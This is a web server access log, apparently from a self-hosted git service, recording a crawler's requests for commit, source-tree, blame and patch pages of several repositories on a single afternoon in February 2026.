"https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:13:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" [Client 74.7.227.38] [Length 19811] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:13:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 15644] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:13:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.patch" [Client 74.7.227.38] [Length 17952097] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 120356] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" [Client 74.7.227.38] [Length 10203] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" [Client 74.7.227.38] [Length 14309] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" [Client 74.7.227.38] [Length 11957] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" [Client 74.7.227.38] [Length 10963] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 22229] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 15593] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/fd51c36120e0bc559f08a35a65c69351c564222a" [Client 74.7.227.38] [Length 7492] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" [Client 74.7.227.38] [Length 15424] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a" [Client 74.7.227.38] [Length 11666] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" [Client 74.7.227.38] [Length 10945] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" +[17/Feb/2026:13:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 74.7.227.38] [Length 17038] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=36" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" +[17/Feb/2026:13:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" [Client 74.7.227.38] [Length 10804] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" +[17/Feb/2026:13:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" [Client 74.7.227.38] [Length 10563] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" [Client 74.7.227.38] [Length 9914] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" [Client 74.7.227.38] [Length 11610] [Gzip 5.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" [Client 74.7.227.38] [Length 10775] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" [Client 74.7.227.38] [Length 11449] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" [Client 74.7.227.38] [Length 11883] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" [Client 74.7.227.38] [Length 11476] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" [Client 74.7.227.38] [Length 9909] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" +[17/Feb/2026:13:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" [Client 74.7.227.38] [Length 10629] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" +[17/Feb/2026:13:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" [Client 74.7.227.38] [Length 14345] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" [Client 74.7.227.38] [Length 10642] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" [Client 74.7.227.38] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" +[17/Feb/2026:13:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" +[17/Feb/2026:13:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" [Client 74.7.227.38] [Length 11603] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" [Client 74.7.227.38] [Length 11192] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:13:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" [Client 74.7.227.38] [Length 9857] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" +[17/Feb/2026:13:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" +[17/Feb/2026:13:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" +[17/Feb/2026:13:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" [Client 74.7.227.38] [Length 11314] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:13:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" [Client 74.7.227.38] [Length 10728] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" +[17/Feb/2026:13:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services" [Client 74.7.227.38] [Length 9918] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" [Client 74.7.227.38] [Length 10564] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" [Client 74.7.227.38] [Length 10531] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" +[17/Feb/2026:13:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services" [Client 74.7.227.38] [Length 9887] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" +[17/Feb/2026:13:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" +[17/Feb/2026:13:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" [Client 74.7.227.38] [Length 10727] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:13:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:13:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:13:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" [Client 74.7.227.38] [Length 10867] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:13:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" [Client 74.7.227.38] [Length 10470] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" [Client 74.7.227.38] [Length 10859] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:13:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services" +[17/Feb/2026:13:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" +[17/Feb/2026:13:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" [Client 74.7.227.38] [Length 9837] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" +[17/Feb/2026:13:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services" [Client 74.7.227.38] [Length 9841] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services" +[17/Feb/2026:13:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:13:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" [Client 74.7.227.38] [Length 9826] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" +[17/Feb/2026:13:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" [Client 74.7.227.38] [Length 10289] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" +[17/Feb/2026:13:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" [Client 74.7.227.38] [Length 11003] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" +[17/Feb/2026:13:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" [Client 74.7.227.38] [Length 10085] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" +[17/Feb/2026:13:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" [Client 74.7.227.38] [Length 10856] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 